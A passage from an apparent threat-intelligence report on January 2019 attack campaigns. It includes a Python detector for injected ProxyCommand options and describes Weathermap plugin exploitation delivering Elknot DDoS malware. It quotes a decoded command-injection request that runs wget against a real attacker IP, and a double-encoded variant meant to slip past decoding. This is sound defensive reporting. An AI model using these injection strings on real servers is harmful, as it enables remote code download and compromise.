Vulnerabilities, Exploits, and Malware Driving Attack Campaigns in January 2019



After the vulnerable server decodes the string, it is instructed to download a malicious file. The malicious request after decoding is:

oProxyCommand= wget http://185.29.8.28/down.php&port=143&user=sdf&passwd=sadf&server_type=imap&f_submit=Submit.

Again, in this case the threat actor took down the malicious file download.php before the researchers could retrieve and analyze it.
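Because the injected ProxyCommand option only appears once the server URL-decodes the request, a detector has to decode before matching. The following is an added example (not code from the original article): it decodes captured request strings until they stop changing, then flags any decoded `oProxyCommand=` option that carries a remote fetch. The sample requests are constructed for the example, and the assumption that the injection rides in a `server` parameter is ours, not the article's.

```python
import re
from typing import Optional
from urllib.parse import unquote_plus

# Constructed sample query strings (not captured traffic from the article),
# recorded URL-encoded as a web server log or WAF would store them.
SAMPLE_REQUESTS = [
    # single-encoded form of the decoded request quoted above
    "server=-oProxyCommand%3Dwget%20http%3A%2F%2F185.29.8.28%2Fdown.php"
    "&port=143&user=sdf&passwd=sadf&server_type=imap&f_submit=Submit",
    # double-encoded variant: a single decode pass would miss the option
    "server=%2DoProxyCommand%253Dwget%2520http%253A%252F%252F185.29.8.28"
    "%252Fdown.php&port=143",
    # benign IMAP login with an ordinary hostname
    "server=imap.example.org&port=143&user=alice&passwd=s3cret"
    "&server_type=imap&f_submit=Submit",
]

PROXYCMD_RE = re.compile(r"oProxyCommand\s*=\s*(\S.*)", re.IGNORECASE)
FETCH_RE = re.compile(r"\b(wget|curl)\b", re.IGNORECASE)


def fully_decode(s: str, max_rounds: int = 3) -> str:
    """URL-decode until the string stops changing, so double encoding
    cannot hide the option from the pattern match."""
    for _ in range(max_rounds):
        decoded = unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    return s


def inspect_request(raw: str) -> Optional[dict]:
    """Return a finding for a request carrying an injected ProxyCommand,
    or None when no such option is present after decoding."""
    decoded = fully_decode(raw)
    match = PROXYCMD_RE.search(decoded)
    if not match:
        return None
    # The injected command ends where the next form field begins.
    command = match.group(1).split("&")[0].strip()
    return {
        "injected_option": "oProxyCommand",
        "command": command,
        "urls": re.findall(r"https?://\S+", command),
        "remote_fetch": bool(FETCH_RE.search(command)),
    }


def scan(requests) -> list:
    """Index every request that yields a finding."""
    return [(i, f) for i, r in enumerate(requests) if (f := inspect_request(r))]
```

The `urls` field gives the download location to block or hunt for in proxy logs; the `remote_fetch` flag separates a download-and-execute attempt from other option injection.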

Weathermap Editor (cacti plugin) Arbitrary Code Execution (CVE-2013-3739)

Another known threat actor was detected trying to exploit the PHP Weathermap Editor Cacti plugin. This vulnerability was first disclosed in April 2013. The threat actor attacks the vulnerability in PHP Weathermap and tries to download and execute a variant of the Elknot/BillGates malware. Elknot is an infamous DDoS botnet family that runs on Linux and Windows systems. This malware, first detected in 2014, is used to launch DDoS attacks and seems to be spreading again. The attack vectors available within the malware include ICMP flood, TCP flood, UDP flood, SYN flood, HTTP flood (Layer 7), and DNS reflection floods. As we can see in Figure 8, 33 engines on VirusTotal.com detected this file as malicious.


